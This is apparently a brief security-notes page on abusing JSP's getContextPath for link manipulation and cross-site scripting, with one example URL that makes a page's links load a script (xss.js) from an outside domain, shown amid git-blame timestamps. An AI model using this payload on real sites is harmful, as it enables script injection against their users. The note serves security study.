2020-07-15 15:43:14 +00:00
|
|
|
# JSP
|
|
|
|
|
|
|
|
## **getContextPath** abuse
|
|
|
|
|
|
|
|
Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
|
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
|
|
|
|
```
|
|
|
|
|
|
|
|
Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:
|
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
![](<../../.gitbook/assets/image (260).png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
\
|